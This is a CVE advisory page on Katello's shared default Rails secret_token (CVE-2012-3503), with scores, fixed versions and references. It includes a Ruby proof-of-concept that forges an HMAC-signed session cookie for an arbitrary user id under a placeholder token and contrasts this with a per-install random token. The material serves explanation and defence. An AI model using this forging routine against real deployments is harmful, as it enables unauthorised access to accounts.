CVE-2012-3503
Description
The installation script in Katello 1.0 and earlier does not generate a per-installation value for Application.config.secret_token, so every default installation ends up with the same secret token. Rails uses secret_token as the HMAC key that authenticates signed session cookies, so a remote attacker who knows the shared default can craft a valid session cookie and authenticate to the CloudForms System Engine web interface as an arbitrary user, without any credentials.
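The following Ruby script is an added illustration of the cookie-forgery mechanism described above; it is not Katello's code and does not reproduce the real default token. It models the Rails 3-era cookie store (Marshal-serialised session, Base64, HMAC-SHA1 keyed by secret_token), forges a session for a chosen user id with a constructed placeholder token, and shows that the same forgery fails against an installation whose token was generated randomly at install time. The `DEFAULT_SECRET_TOKEN` constant and the `'user_id'` session key are assumptions made for the example.

```ruby
require 'openssl'
require 'base64'
require 'securerandom'

# Constructed stand-in for the token every default install shared.
# The real value is not reproduced here; any fixed string has the same effect.
DEFAULT_SECRET_TOKEN = 'katello-default-secret-token-placeholder'

# Rails 3-era cookie store: the session hash is Marshal-serialised, Base64-encoded
# and authenticated with HMAC-SHA1 keyed by config.secret_token. There is no
# encryption: the token is an integrity key, so whoever holds it can mint any session.
def sign_session(secret, session_hash)
  payload = Base64.strict_encode64(Marshal.dump(session_hash))
  "#{payload}--#{OpenSSL::HMAC.hexdigest('SHA1', secret, payload)}"
end

# Constant-time comparison so the verifier does not leak the digest byte by byte.
def secure_compare(a, b)
  return false unless a.bytesize == b.bytesize
  a.bytes.zip(b.bytes).reduce(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

# Server-side verification: returns the session hash, or nil if the HMAC fails.
# Marshal.load of attacker-controlled bytes is dangerous in its own right, which is
# why a known secret_token on Rails of this era meant more than impersonation.
def load_session(secret, cookie)
  payload, digest = cookie.to_s.split('--', 2)
  return nil if payload.nil? || digest.nil?
  expected = OpenSSL::HMAC.hexdigest('SHA1', secret, payload)
  return nil unless secure_compare(expected, digest)
  Marshal.load(Base64.strict_decode64(payload))
end

# Attacker side: sign a session for any user id with the shared default token.
# The 'user_id' key is a hypothetical session layout, not Katello's actual one.
def forge_session_cookie(secret, user_id)
  sign_session(secret, { 'user_id' => user_id })
end

# Does a cookie forged with attacker_secret authenticate on a server that uses server_secret?
def forged_cookie_accepted?(server_secret, attacker_secret, user_id = 1)
  session = load_session(server_secret, forge_session_cookie(attacker_secret, user_id))
  !session.nil? && session['user_id'] == user_id
end

# What a fixed installer has to do instead: draw a fresh, high-entropy token per install.
def generate_secret_token
  SecureRandom.hex(64)
end

if __FILE__ == $PROGRAM_NAME
  vulnerable_install = DEFAULT_SECRET_TOKEN   # identical on every host
  fixed_install      = generate_secret_token  # unique to this host
  puts "shared default token, forged cookie accepted: #{forged_cookie_accepted?(vulnerable_install, DEFAULT_SECRET_TOKEN)}"
  puts "per-install token, forged cookie accepted:    #{forged_cookie_accepted?(fixed_install, DEFAULT_SECRET_TOKEN)}"
end
```

The practical check on an affected deployment is therefore not "is the token long enough" but "was it generated here": a token that appears verbatim on a second host, or in a packaged config file, is compromised regardless of its length.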
Risk Information
Base Score
9.8
CRITICAL (CVSS v3.1 qualitative rating for a base score of 9.8)
Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score
Exploitation Probability (30-day)
1.303 % (EPSS is a probability in [0, 1]; a value above 1 is the percentage form, i.e. 0.013)
Associated Vulnerability
| Fixed in | OS Platform |
|---|---|
| Ruby-katello 1.0.6 | Windows |
| Ruby-katello 1.1.7 | Windows |
| Ruby-katello for Linux 1.0.6 | Linux |
| Ruby-katello for Linux 1.1.7 | Linux |
Patch Details
No records found
References
https://nvd.nist.gov/vuln/detail/CVE-2012-3503
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3503